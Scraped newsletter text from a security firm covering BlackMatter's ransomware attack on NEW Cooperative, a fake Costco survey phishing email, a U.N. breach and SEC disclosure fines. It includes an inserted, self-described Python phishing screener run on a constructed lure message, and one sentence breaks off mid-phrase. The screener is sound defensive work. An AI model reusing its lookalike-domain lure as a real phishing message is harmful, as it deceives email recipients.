    Ransomware gangs have continued to put pressure on critical infrastructure around the world. They see these companies as very lucrative targets, given the public’s reliance on many of their outputs or products. What’s interesting about this case is BlackMatter has previously stated that they will not target critical infrastructure facilities. Screenshots of the ransomware negotiation between BlackMatter and NEW show the cooperative asking why they were targeted, given they are crucial to the nation’s food supply. BlackMatter replied proclaiming “You do not fall under the rules, everyone will only incur losses, everything is tied to the commerce, the critical ones mean the vital needs of a person, and you earn money.”

    BlackMatter then attempts to further persuade NEW Cooperative into paying the ransom, citing that “Since everything is so serious with you, let’s come to an agreement quickly and solve everything quickly.”.  

    What does this mean?

    This attack brings into question the blurry lines some cybercriminal gangs operate along. If a company with direct ties to the United States’ food supply chain is not considered critical infrastructure, what is? NEW Cooperative later stressed to BlackMatter that the impact of this attack would be more significant than Colonial Pipeline. With their systems offline, they will have no way to process orders or direct distribution of feed and grain vital to farmers across the country.

    NEW Cooperative has passed on a directive to all of their customers, assuring them that they will still get the feed needed to feed their animals while NEW’s systems are down. Farmers in Iowa reported that although the farming industry has adapted to many technological advances, this attack has forced them to use old school methods like paper tickets to measure the weight of a truck and the moisture in the grain.

    What is the solution?

    While cybersecurity directives from the White House help bring awareness to ransomware attacks and cybercrime, more has to be done. It is time for all organizations to talk about their security posture. These ransomware gangs have proven that no company is off-limits as a target, and companies must defend themselves. The private and public sectors must test their disaster recovery plans immediately and review their ability to respond to cyber-attacks.

    How Can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. We provide advanced solutions to protect critical IT infrastructure, such as the popular “CISO-as-a-Service”, wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is an ISO 27001:2013 (Information Security Management), ISO 9001:2015, and CMMI V2.0 Level 3 certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.

    Questions or concerns? Feel free to reach out to us any time – https://www.netizen.net/contact

  • Netizen Cybersecurity Bulletin (September 14th, 2021)

    Overview

    • Phish Tale of the Week
    • Hackers target United Nations in latest data breach
    • U.S. SEC changes stance on Cybersecurity. What does this mean for your business?
    • How can Netizen help?

    Phish Tale of the Week

    Phishing attempts can often target specific groups that can be exploited by malicious actors. In this instance, we see a phishing scam targeting unsuspecting employees who may be expecting an invoice to be paid, or simply someone who doesn’t check their email rigorously. This email appears to be a survey request from Costco in which the recipient could receive $50 for their participation. The email carries Costco’s branding and a convincing message saying the survey should only take 30 seconds, so why not click on the link and get our $50? Unfortunately, there are plenty of reasons not to click that email right away.

    Take a look below:

    1. The first red flag on this email is the sender address. Always thoroughly inspect the sender address to ensure it’s from a trusted sender. In the future, check all suspicious emails from companies against previous correspondence you’ve received and make sure the sender address is the same.
    2. The second warning sign in this email is the inconsistent messaging. The subject line reads that “$50 could be yours today”, yet there is no further mention of this incentive. Look for consistency throughout emails from companies. Most companies will also attach a terms and conditions statement regarding the incentive for the survey.
    3. The final warning sign for this email is the callouts at the bottom. Two addresses are referenced at the bottom of the email, neither of which belongs to any Costco location. An easy way to spot a scam email is to look up the buildings or locations mentioned in the correspondence. When searched on maps, each of these locations turns up as an empty address with no occupants.


    General Recommendations:

    A phishing email will typically direct the user to click on a link where they will then be prompted to update personal information, such as a password, credit card, social security, or bank account information. A legitimate company already has this sensitive information and would not ask for it again, especially via email. 

    • Scrutinize your emails before clicking anything. Have you ordered anything recently? Does this order number match the one you already have? Did the email come from a store you don’t usually order supplies from or a service you don’t use? If so, it’s probably a phishing attempt.
    • Verify that the sender is actually from the company sending the message.
    • Did you receive a message or email from someone you don’t recognize? Are they asking you to sign into a website to give Personally Identifiable Information (PII) such as credit card numbers, social security number, etc.? A legitimate company will never ask for PII via instant message or email.
    • Do not give out personal or company information over the internet.
    • Do not click on unrecognized links or attachments. If you do proceed, verify that the URL is the correct one for the company/service and that it has the proper security in place, such as HTTPS.

    Many phishing emails convey a sense of urgency or even aggressiveness as a form of intimidation. Any email requesting immediate action should be vetted thoroughly to determine whether or not it is a scam. Also, beware of messages that seek to tempt users into opening an attachment or visiting a link. For example, an attachment titled “Fix your account now” may draw the question “What is wrong with my account?” and prompt you to click a suspicious link.
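    One way to mechanise the checks in the recommendations above and in the Phish Tale red flags (sender domain compared against previous correspondence, a display name that borrows the brand, urgency in the subject line, non-HTTPS or off-brand links, and attachments), added here as an example that is not part of the newsletter or of any Netizen tool. The trusted-domain list, the urgency keywords, the brand name “costco” and both sample messages are constructed assumptions for the illustration.

```python
"""Added example (not from the newsletter): screening an inbound message against
the phishing checklist above. The trusted-sender list, the keyword list and the
sample messages are all constructed for this illustration."""
import re
from email import message_from_string
from email.utils import parseaddr
from typing import Dict, List, Set
from urllib.parse import urlparse

# Constructed allowlist: domains seen in previous legitimate correspondence,
# keyed by the brand a message claims to come from (the checklist's
# "compare against previous correspondence" step).
TRUSTED_SENDERS: Dict[str, Set[str]] = {
    "costco": {"costco.com", "email.costco.com"},
}

# Constructed list of words that signal manufactured urgency; matched as whole
# words in the subject so that e.g. "known" does not trip the "now" rule.
URGENCY_RE = re.compile(r"\b(today|immediately|now|urgent|suspended)\b", re.I)

URL_RE = re.compile(r"https?://[^\s<>\"']+")


def registrable_domain(host: str) -> str:
    """Reduce a hostname to its last two labels. Simplification: this does not
    handle multi-label public suffixes such as co.uk."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def screen_email(raw: str, brand: str) -> List[str]:
    """Return the red flags found in a raw RFC 5322 message that presents itself
    as coming from `brand`. An empty list means no check fired."""
    msg = message_from_string(raw)
    trusted = {registrable_domain(d) for d in TRUSTED_SENDERS.get(brand, set())}
    flags: List[str] = []

    # 1. Sender address: the display name is free text chosen by the sender,
    #    so judge the domain of the real address against known-good senders.
    display_name, address = parseaddr(msg.get("From", ""))
    sender_domain = registrable_domain(address.rsplit("@", 1)[-1]) if "@" in address else ""
    if sender_domain not in trusted:
        flags.append(f"sender domain {sender_domain!r} is not a known {brand} sender")
        if brand in display_name.lower():
            flags.append(f"display name {display_name!r} impersonates {brand}")

    # 2. Urgency or intimidation in the subject line.
    subject = msg.get("Subject", "")
    if URGENCY_RE.search(subject):
        flags.append(f"subject pushes urgency: {subject!r}")

    # 3. Attachments are noted; 4. links must use HTTPS and point at a brand domain.
    body_text: List[str] = []
    for part in msg.walk():
        if "attachment" in part.get("Content-Disposition", ""):
            flags.append(f"message carries attachment {part.get_filename()!r}")
        elif part.get_content_type() == "text/plain":
            body_text.append(part.get_payload(decode=True).decode("utf-8", "replace"))
    for url in URL_RE.findall("\n".join(body_text)):
        parsed = urlparse(url)
        if parsed.scheme != "https":
            flags.append(f"link is not HTTPS: {url}")
        if registrable_domain(parsed.hostname or "") not in trusted:
            flags.append(f"link host {parsed.hostname!r} is not a known {brand} domain")
    return flags


# Constructed sample modelled on the survey lure described above.
SAMPLE_PHISH = """\
From: "Costco Wholesale" <rewards@costco-survey-center.net>
To: employee@example.com
Subject: $50 could be yours today
Content-Type: text/plain; charset="utf-8"

Thank you for shopping at Costco. This survey takes only 30 seconds:
http://costco-survey-center.net/survey?id=123
Questions? Visit https://www.costco.com/help
"""

# Constructed sample of a routine message from a known sender domain.
SAMPLE_LEGIT = """\
From: Costco Member Services <noreply@email.costco.com>
To: employee@example.com
Subject: Your membership renewal receipt
Content-Type: text/plain; charset="utf-8"

View your receipt at https://www.costco.com/receipts
"""

if __name__ == "__main__":
    for name, sample in (("phish", SAMPLE_PHISH), ("legit", SAMPLE_LEGIT)):
        flags = screen_email(sample, "costco")
        print(f"{name}: {len(flags)} red flag(s)")
        for flag in flags:
            print("  -", flag)
```

    Run as-is, the constructed lure produces five findings (unknown sender domain, brand name in the display name, urgency in the subject, a plain-HTTP link, and a link host outside the brand’s domains) while the routine message produces none. The allowlist is what makes the lookalike domain stand out, so it has to be kept current from real past correspondence; the script is an aid to the human scrutiny the checklist asks for, not a replacement for it.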

    For Costco-specific recommendations and tips, check out their fraud detection center here.

    Cybersecurity Brief

    In this week’s Cybersecurity Brief:

    Hackers target United Nations in latest data breach

    Last week, cybersecurity research firm Resecurity discovered that an outside hacker group had targeted the United Nations’ internal network. The breach first occurred on April 5th, 2021, with hostile activity finally concluding in their environment on August 7th. The primary purpose of this attack was intelligence gathering, with threat actors making off with a trove of data that could be utilized to perform cyberattacks against other government organizations in the future.

    Experts in the industry have theorized that stolen login credentials from a U.N. employee were the initial attack vector the hackers used to gain access to the U.N.’s systems. Many believe that the credentials were sourced from a website on the dark web known for selling and distributing stolen credentials.

    When asked why the threat actors targeted the U.N., Resecurity CEO Gene Yoo had this to add: “Organizations like the U.N are a high-value target for cyber espionage activity. The actor conducted the intrusion with the goal of compromising large numbers of users within the U.N. networking for further long-term intelligence gathering.”

    Reports from this incident vary on the scale of the attack. On the one hand, the U.N. claims that the attackers were doing nothing more than taking screenshots of the compromised network. On the other hand, Resecurity believes that the attackers stole data during this incident, which may become a catalyst for more attacks.

    U.N. spokesman Farhan Haq reported that “This attack had been detected before we were notified by Resecurity, and corrective actions to mitigate the impact of the breach had already been planned and were being implemented.” Haq also noted that the United Nations had been frequently targeted by cyber-attacks before, which is not a new phenomenon to the organization.

    To read more about this article, click here.

    U.S. SEC changes stance on Cybersecurity. What does this mean for your business?

    The United States Securities and Exchange Commission (SEC) has reevaluated what it deems a threat for companies. Starting this year, the SEC will consider cyber vulnerabilities an enormous business risk. This news comes as the regulatory commission levied significant fines on two well-known companies for failure to disclose cybersecurity issues. British education company Pearson PLC agreed to pay $1,000,000 in settlement charges following reports that it misled investors after a 2018 data breach saw millions of student records stolen from their database. More recently, real estate company First American Financial agreed to a $500,000 settlement after failing to disclose a vulnerability in their environment that exposed up to 800 million files, many of which included social security numbers and other PII.

    This shift in how the SEC punishes companies for cybersecurity malpractice could significantly affect how companies view cybersecurity threats and issues moving forward. Currently, businesses are required to disclose “risk factors” so public investors can better understand the company’s stock. These “risk factors” include operations, competitive, economic, and cybersecurity incidents. However, few companies have ever faced any real regulatory repercussions from the SEC after suffering a cyberattack.

    What baffles many is that current risk disclosure policies were based on The Securities and Exchange Act of 1934, written during a time when the internet was still over half a century away. While the agency amended the procedures to include significant cybersecurity-related risks and incidents in 2011, and further echoed that cybersecurity incidents pose a substantial threat to our capital markets in 2018, there is still more to be done.

    This report comes as defense contractors have begun the painstakingly slow process of adopting the Cybersecurity

    The fines passed down to Pearson PLC and First American Financial are watershed moments for how companies view cybersecurity. Before, organizations took a more relaxed approach to disclosing vulnerabilities and their overall cyber posture. Hopefully, the enforcement of these penalties will shine a light on the operational woes that cybersecurity incidents can create. Organizations must act with clarity and conciseness to combat the ever-changing cyber landscape. The time for action is now.

    For more information check out the rest of the article here.

    How Can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. We provide advanced solutions to protect critical IT infrastructure, such as the popular “CISO-as-a-Service”, wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.